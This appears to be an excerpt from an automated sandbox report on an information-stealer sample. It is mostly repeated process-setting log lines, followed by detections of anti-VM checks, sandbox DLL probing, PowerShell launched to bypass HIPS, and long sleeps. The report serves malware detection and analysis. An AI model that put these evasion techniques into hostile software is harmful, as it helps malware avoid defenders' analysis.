Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stealer-CR-0110.exe PID: 6396, type: MEMORYSTR

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\user\desktop\849128312.cmd.fjz

Key value queried: Powershell behavior

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory allocated: 4A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Memory allocated: 4A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory allocated: 2830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory allocated: 4930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory allocated: 5D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Memory allocated: 6D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2530000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 599076	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598966	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598835	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598712	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598244	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597193	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596948	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596698	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596567	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596230	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 596108	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Thread delayed: delay time: 595982	Jump to behavior
